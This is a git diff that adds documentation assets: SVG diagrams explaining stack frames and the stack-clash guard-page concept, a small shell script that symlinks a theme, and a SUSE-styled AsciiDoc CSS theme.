+ + + + execution flow + + diff --git a/inkscape/stack_clash.svg b/inkscape/stack_clash.svg new file mode 100644 index 0000000..eea78b3 --- /dev/null +++ b/inkscape/stack_clash.svg @@ -0,0 +1,510 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + image/svg+xml + + + + + + +   +   +   + + + +   + Virtual Address Space + + + <heap bottom> + + <heap top> + <stack bottom> + + <stack top> + Heap(grows up) + Stack(grows down) + + [stack guard page] + + + + originally onepage large (4 KB) + + + Managing to jump overthe guard page will causethe stack to operatein an already allocatedmemory area. + + + diff --git a/inkscape/stack_frame.svg b/inkscape/stack_frame.svg new file mode 100644 index 0000000..131ef0f --- /dev/null +++ b/inkscape/stack_frame.svg @@ -0,0 +1,530 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + image/svg+xml + + + + + + + /* * Some simple, fuzzy code for explaining * the stack frame setup. * * Hex addresses are just rounded pseudo * values for better readability. */ void funcB(uint32_t num) { uint64_t local_var; register uint32_t index;  /* some more code */} void funcA() { /* some local vars */ funcB(some_num);  /* some more code */} + + stack frames from functionsfurther up the stack + + + %rbp 0x8000base pointer for funcA() + The Stack + start addressof the stack segment + + stack framefor funcA() + < local variables funcA() > + + + [ parameter(s) to funcB() ] < return address to funcA() > + + + + %rbp 0x7000base pointer for funcB() + < funcA()'s old value of %rbp > + + stack framefor funcB() + + + + %rsp 0x6500top of the stack wherenew data can be pushed + + < local variables funcB() > + + + further function callsdown the stack + + diff --git a/themes/install.sh b/themes/install.sh new file mode 100755 index 0000000..2563959 --- /dev/null +++ b/themes/install.sh @@ -0,0 +1,14 @@ +#!/bin/bash + +LOCAL_THEMES="$HOME/.asciidoc/themes" +OURDIR=`dirname $(realpath $0)` +MKDIR=`which mkdir` + +if [ -z "$MKDIR" ]; then + echo "no mkdir found" 1>&2 + exit 1 +fi + +$MKDIR -p "$LOCAL_THEMES" || exit 1 +cd "$LOCAL_THEMES" +ln -sf "$OURDIR/suse" || exit 1 diff --git a/themes/suse/suse.css b/themes/suse/suse.css new file mode 100644 index 0000000..5689b83 --- /dev/null +++ b/themes/suse/suse.css @@ -0,0 +1,558 @@ +/* Shared CSS for AsciiDoc xhtml11 and html5 backends */ + +/* Default font. */ +body { + font-family: Liberation Sans; +} + +/* Title font. */ +h1, h2, h3, h4, h5, h6, +div.title, caption.title, +thead, p.table.header, +#toctitle, +#author, #revnumber, #revdate, #revremark, +#footer { + font-family: Arial,Helvetica,sans-serif; +} + +body { + margin: 1em 5% 1em 5%; +} + +a { + color: #0D2C40; + text-decoration: underline; +} +a:visited { + color: #71D6E0; +} + +em { + font-style: italic; + color: #00C081; +} + +strong { + font-weight: bold; + color: #02A49C; +} + +h1, h2, h3, h4, h5, h6 { + color: #02D35F; + margin-top: 1.2em; + margin-bottom: 0.5em; + line-height: 1.3; +} + +h1, h2, h3 { + border-bottom: 2px solid silver; +} +h2 { + padding-top: 0.5em; +} +h3 { + float: left; +} +h3 + * { + clear: left; +} +h5 { + font-size: 1.0em; +} + +div.sectionbody { + margin-left: 0; +} + +hr { + border: 1px solid silver; +} + +p { + margin-top: 0.5em; + margin-bottom: 0.5em; +} + +ul, ol, li > p { + margin-top: 0; +} +ul > li { color: #aaa; } +ul > li > * { color: black; } + +.monospaced, code, pre { + font-family: "Courier New", Courier, monospace; + font-size: inherit; + color: #00C081; + padding: 0; + margin: 0; +} +pre { + white-space: pre-wrap; +} + +#author { + color: #02A49C; + font-weight: bold; + font-size: 1.1em; +} +#email { +} +#revnumber, #revdate, #revremark { +} + +#footer { + font-size: small; + border-top: 2px solid silver; + padding-top: 0.5em; + margin-top: 4.0em; +} +#footer-text { + float: left; + padding-bottom: 0.5em; +} +#footer-badges { + float: right; + padding-bottom: 0.5em; +} + +#preamble { + margin-top: 1.5em; + margin-bottom: 1.5em; +} +div.imageblock, div.exampleblock, div.verseblock, +div.quoteblock, div.literalblock, div.listingblock, div.sidebarblock, +div.admonitionblock { + margin-top: 1.0em; + margin-bottom: 1.5em; +} +div.admonitionblock { + margin-top: 2.0em; + margin-bottom: 2.0em; + margin-right: 10%; + color: #00C081; +} + +div.content { /* Block element content. */ + padding: 0; +} + +/* Block element titles. */ +div.title, caption.title { + color: #02D35F; + font-weight: bold; + text-align: left; + margin-top: 1.0em; + margin-bottom: 0.5em; +} +div.title + * { + margin-top: 0; +} + +td div.title:first-child { + margin-top: 0.0em; +} +div.content div.title:first-child { + margin-top: 0.0em; +} +div.content + div.title { + margin-top: 0.0em; +} + +div.sidebarblock > div.content { + background: #ffffee; + border: 1px solid #dddddd; + border-left: 4px solid #f0f0f0; + padding: 0.5em; +} + +div.listingblock > div.content { + border: 1px solid #dddddd; + border-left: 5px solid #f0f0f0; + background: #f8f8f8; + padding: 0.5em; +} + +div.quoteblock, div.verseblock { + padding-left: 1.0em; + margin-left: 1.0em; + margin-right: 10%; + border-left: 5px solid #f0f0f0; + color: #A0FF5F; +} + +div.quoteblock > div.attribution { + padding-top: 0.5em; + text-align: right; +} + +div.verseblock > pre.content { + font-family: inherit; + font-size: inherit; +} +div.verseblock > div.attribution { + padding-top: 0.75em; + text-align: left; +} +/* DEPRECATED: Pre version 8.2.7 verse style literal block. */ +div.verseblock + div.attribution { + text-align: left; +} + +div.admonitionblock .icon { + vertical-align: top; + font-size: 1.1em; + font-weight: bold; + text-decoration: underline; + color: #527bbd; + padding-right: 0.5em; +} +div.admonitionblock td.content { + padding-left: 0.5em; + border-left: 3px solid #dddddd; +} + +div.exampleblock > div.content { + border-left: 3px solid #dddddd; + padding-left: 0.5em; +} + +div.imageblock div.content { padding-left: 0; } +span.image img { border-style: none; vertical-align: text-bottom; } +a.image:visited { color: white; } + +dl { + margin-top: 0.8em; + margin-bottom: 0.8em; +} +dt { + margin-top: 0.5em; + margin-bottom: 0; + font-style: normal; + color: navy; +} +dd > *:first-child { + margin-top: 0.1em; +} + +ul, ol { + list-style-position: outside; +} +ol.arabic { + list-style-type: decimal; +} +ol.loweralpha { + list-style-type: lower-alpha; +} +ol.upperalpha { + list-style-type: upper-alpha; +} +ol.lowerroman { + list-style-type: lower-roman; +} +ol.upperroman { + list-style-type: upper-roman; +} + +div.compact ul, div.compact ol, +div.compact p, div.compact p, +div.compact div, div.compact div { + margin-top: 0.1em; + margin-bottom: 0.1em; +} + +tfoot { + font-weight: bold; +} +td > div.verse { + white-space: pre; +} + +div.hdlist { + margin-top: 0.8em; + margin-bottom: 0.8em; +} +div.hdlist tr { + padding-bottom: 15px; +} +dt.hdlist1.strong, td.hdlist1.strong { + font-weight: bold; +} +td.hdlist1 { + vertical-align: top; + font-style: normal; + padding-right: 0.8em; + color: navy; +} +td.hdlist2 { + vertical-align: top; +} +div.hdlist.compact tr { + margin: 0; + padding-bottom: 0; +} + +.comment { + background: yellow; +} + +.footnote, .footnoteref { + font-size: 0.8em; +} + +span.footnote, span.footnoteref { + vertical-align: super; +} + +#footnotes { + margin: 20px 0 20px 0; + padding: 7px 0 0 0; +} + +#footnotes div.footnote { + margin: 0 0 5px 0; +} + +#footnotes hr { + border: none; + border-top: 1px solid silver; + height: 1px; + text-align: left; + margin-left: 0; + width: 20%; + min-width: 100px; +} + +div.colist td { + padding-right: 0.5em; + padding-bottom: 0.3em; + vertical-align: top; +} +div.colist td img { + margin-top: 0.3em; +} + +@media print { + #footer-badges { display: none; } +} + +#toc { + margin-bottom: 2.5em; +} + +#toctitle { + color: #02D35F; + font-size: 1.1em; + font-weight: bold; + margin-top: 1.0em; + margin-bottom: 0.1em; +} + +div.toclevel0, div.toclevel1, div.toclevel2, div.toclevel3, div.toclevel4 { + margin-top: 0; + margin-bottom: 0; +} +div.toclevel2 { + margin-left: 2em; + font-size: 0.9em; +} +div.toclevel3 { + margin-left: 4em; + font-size: 0.9em; +} +div.toclevel4 { + margin-left: 6em; + font-size: 0.9em; +} + +span.aqua { color: aqua; } +span.black { color: black; } +span.blue { color: blue; } +span.fuchsia { color: fuchsia; } +span.gray { color: gray; } +span.green { color: green; } +span.lime { color: lime; } +span.maroon { color: maroon; } +span.navy { color: navy; } +span.olive { color: olive; } +span.purple { color: purple; } +span.red { color: red; } +span.silver { color: silver; } +span.teal { color: teal; } +span.white { color: white; } +span.yellow { color: yellow; } + +span.aqua-background { background: aqua; } +span.black-background { background: black; } +span.blue-background { background: blue; } +span.fuchsia-background { background: fuchsia; } +span.gray-background { background: gray; } +span.green-background { background: green; } +span.lime-background { background: lime; } +span.maroon-background { background: maroon; } +span.navy-background { background: navy; } +span.olive-background { background: olive; } +span.purple-background { background: purple; } +span.red-background { background: red; } +span.silver-background { background: silver; } +span.teal-background { background: teal; } +span.white-background { background: white; } +span.yellow-background { background: yellow; } + +span.big { font-size: 2em; } +span.small { font-size: 0.6em; } + +span.underline { text-decoration: underline; } +span.overline { text-decoration: overline; } +span.line-through { text-decoration: line-through; } + +div.unbreakable { page-break-inside: avoid; } + + +/* + * xhtml11 specific + * + * */ + +div.tableblock { + margin-top: 1.0em; + margin-bottom: 1.5em; +} +div.tableblock > table { + border: 3px solid #527bbd; +} +thead, p.table.header { + font-weight: bold; + color: #527bbd; +} +p.table { + margin-top: 0; +} +/* Because the table frame attribute is overriden by CSS in most browsers. */ +div.tableblock > table[frame="void"] { + border-style: none; +} +div.tableblock > table[frame="hsides"] { + border-left-style: none; + border-right-style: none; +} +div.tableblock > table[frame="vsides"] { + border-top-style: none; + border-bottom-style: none; +} + + +/* + * html5 specific + * + * */ + +table.tableblock { + margin-top: 1.0em; + margin-bottom: 1.5em; +} +thead, p.tableblock.header { + font-weight: bold; + color: #527bbd; +} +p.tableblock { + margin-top: 0; +} +table.tableblock { + border-width: 3px; + border-spacing: 0px; + border-style: solid; + border-color: #527bbd; + border-collapse: collapse; +} +th.tableblock, td.tableblock { + border-width: 1px; + padding: 4px; + border-style: solid; + border-color: #527bbd; +} + +table.tableblock.frame-topbot { + border-left-style: hidden; + border-right-style: hidden; +} +table.tableblock.frame-sides { + border-top-style: hidden; + border-bottom-style: hidden; +} +table.tableblock.frame-none { + border-style: hidden; +} + +th.tableblock.halign-left, td.tableblock.halign-left { + text-align: left; +} +th.tableblock.halign-center, td.tableblock.halign-center { + text-align: center; +} +th.tableblock.halign-right, td.tableblock.halign-right { + text-align: right; +} + +th.tableblock.valign-top, td.tableblock.valign-top { + vertical-align: top; +} +th.tableblock.valign-middle, td.tableblock.valign-middle { + vertical-align: middle; +} +th.tableblock.valign-bottom, td.tableblock.valign-bottom { + vertical-align: bottom; +} + + +/* + * manpage specific + * + * */ + +body.manpage h1 { + padding-top: 0.5em; + padding-bottom: 0.5em; + border-top: 2px solid silver; + border-bottom: 2px solid silver; +} +body.manpage h2 { + border-style: none; +} +body.manpage div.sectionbody { + margin-left: 3em; +} + +@media print { + body.manpage div#toc { display: none; } +} + +/* + * SUSE custom + */ + +/* + * make list item bullets colored + * + * default seems to be a gray graphic, we replace it by a text bullet in color + * + */ +ul * { + list-style: none; +} + +li * { + padding-left: 0.3em; + text-indent: -.7em; +} + +li::before { + content: "• "; + color: #02A49C; +} + +/* +img.bottomimage { + text-align: right; + align: right; +} +*/